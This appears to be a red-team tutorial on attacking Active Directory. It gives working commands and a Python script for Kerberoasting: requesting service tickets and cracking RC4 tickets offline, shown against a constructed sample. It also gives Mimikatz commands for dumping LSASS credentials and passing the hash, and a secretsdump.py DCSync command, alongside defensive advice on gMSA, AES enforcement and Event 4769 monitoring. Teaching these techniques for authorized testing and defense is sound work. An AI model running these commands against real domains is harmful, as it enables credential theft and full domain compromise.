Active Directory is the most targeted system in internal penetration tests. Understanding the attacks against it is essential for any Red Team professional.
Kerberoasting
Kerberoasting targets service accounts in Active Directory: any domain user can request a service ticket (TGS) for an account that has an SPN, and the ticket's encrypted part is keyed to that account's password (its NT hash for the RC4 etype). The attacker cracks the ticket offline, never touching the account again, until the password is recovered.
How It Works
# Request a service ticket for every account that has an SPN and write them in hashcat format
GetUserSPNs.py -request -dc-ip 192.168.1.1 -outputfile hashes.txt domain/user
# Crack offline: mode 13100 is the RC4 (etype 23) ticket; AES tickets need 19600 (AES128) or 19700 (AES256)
hashcat -m 13100 hashes.txt wordlist.txt
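What hashcat does for each candidate password, as an added example that is not code from the original page or from Impacket/hashcat: derive the service account's NT hash from the guess, re-derive the RC4-HMAC keys for key usage 2 (the TGS ticket enc-part) and test the HMAC-MD5 checksum carried in the $krb5tgs$23$ line. The ticket is constructed inside the script from a known password so it runs offline; the realm, SPN, wordlist and the plaintext stand-in for the ASN.1 EncTicketPart are assumptions.

```python
"""Offline check of a Kerberoasted RC4-HMAC (etype 23) service ticket (added example).

For etype 23 the service account key is its NT hash (MD4 of the UTF-16LE
password), so a guess can be verified against a captured ticket with no
further contact with the domain. Sample ticket, realm, SPN and wordlist are
constructed/assumed; no real data is used."""
import hashlib
import hmac
import struct

KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage for the ticket enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption as the KDC performs it; returns (checksum, edata)."""
    k1 = hmac.new(key, struct.pack("<I", KEY_USAGE_TGS_REP_TICKET), hashlib.md5).digest()
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k2 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k2, confounder + plaintext)


def check_candidate(password: str, checksum: bytes, edata: bytes) -> bool:
    """One trial as hashcat -m 13100 does it: decrypt with the guess, verify the checksum."""
    k1 = hmac.new(nt_hash(password), struct.pack("<I", KEY_USAGE_TGS_REP_TICKET), hashlib.md5).digest()
    k2 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k2, edata)  # confounder || EncTicketPart
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def to_hashcat_line(user, realm, spn, checksum, edata):
    """The $krb5tgs$23$ line that GetUserSPNs.py -outputfile writes."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def crack(line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the ticket, else None."""
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for pw in wordlist:
        if check_candidate(pw, checksum, edata):
            return pw
    return None


# Constructed ticket (assumption): a weak service account password encrypts a stand-in
# for the ASN.1 EncTicketPart; fixed confounder so the line is reproducible.
SERVICE_PASSWORD = "Summer2024!"
SAMPLE_CHECKSUM, SAMPLE_EDATA = rc4_hmac_encrypt(
    nt_hash(SERVICE_PASSWORD), b"constructed EncTicketPart stand-in", b"\x00" * 8)
SAMPLE_LINE = to_hashcat_line("svc_sql", "LAB.LOCAL", "MSSQLSvc/sql01.lab.local:1433",
                              SAMPLE_CHECKSUM, SAMPLE_EDATA)
WORDLIST = ["Welcome1", "Password1", "Summer2024!", "P@ssw0rd"]  # assumed wordlist

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

Every trial costs one MD4 and three HMAC-MD5 computations plus an RC4 pass, which is why a GPU tries billions of guesses per second against an RC4 ticket; an AES ticket forces a PBKDF2 derivation of 4096 iterations per guess, which is the reason the defense below prefers AES.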
Defense
- Use long, random service account passwords (25+ characters); better, move services to group Managed Service Accounts (gMSA), whose long random passwords rotate automatically (every 30 days by default)
- Restrict service accounts to AES via msDS-SupportedEncryptionTypes so the weaker RC4 ticket cannot be requested; LAPS manages local Administrator passwords and helps against lateral movement, but it does not protect domain service accounts from Kerberoasting
- Monitor Event ID 4769 for RC4 tickets (Ticket Encryption Type 0x17) requested by one account for many different service accounts in a short window
Active Directory Privilege Escalation
Pass-the-Hash (PtH)
# Mimikatz: read credential material from LSASS memory (needs local admin; privilege::debug acquires SeDebugPrivilege)
privilege::debug
sekurlsa::logonpasswords
# Pass the hash: start a process whose network authentications use the NTLM hash, no plaintext needed
sekurlsa::pth /user:Administrator /domain:lab.local /ntlm:HASH /run:cmd.exe
DCSync
# Dump every account's secrets by asking the DC to replicate them over DRSUAPI, as another DC would
# Needs Replicating Directory Changes and Replicating Directory Changes All on the domain (held by Domain Admins and DCs by default)
secretsdump.py -just-dc domain/user:password@dc-ip
Warning: These tools are for authorized testing environments only.